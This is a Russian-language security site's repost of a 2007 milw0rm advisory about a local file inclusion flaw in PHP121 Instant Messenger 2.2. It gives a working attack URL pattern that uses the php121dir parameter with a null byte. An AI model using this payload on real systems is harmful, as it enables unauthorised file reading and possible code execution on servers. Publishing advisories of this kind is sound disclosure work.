Уведомление о безопасности: PHP121 Instant Messenger 2.2 Local File Inclusion Vulnerability

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  CVE-2007-1871: Cross site scripting in chcounter 3.1.3
  E107 - (v0.7.8) Access Escalation Vulnerbility - PoC
  Critical phpwiki c99shell exploit
  CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 11 апреля 2007 г.
Subject: PHP121 Instant Messenger 2.2 Local File Inclusion Vulnerability

                        +========================I=R=A=N=========================
===+

                                            PHP121 Version 2.2

                        =========================I=R=A=N=========================
====

                        +========================I=R=A=N=========================
===+

                        Author :

                        Dj7xpl / Dj7xpl[at]Yahoo[dot]com

                        =========================I=R=A=N=========================
====

                        +========================I=R=A=N=========================
===+

                        Type :

                        Local File Inclusion Vulnerability

                        =========================I=R=A=N=========================
====

                        +========================I=R=A=N=========================
===+

                        Download :

                        http://www.php121.com/download.php

                        =========================I=R=A=N=========================
====

                        +========================I=R=A=N=========================
===+

                        Bug :

                        http://[Target]/[Path]/php121db.php?php121dir=[ Local File ]%00

                        =========================I=R=A=N=========================
====

# milw0rm.com [2007-04-09]

test server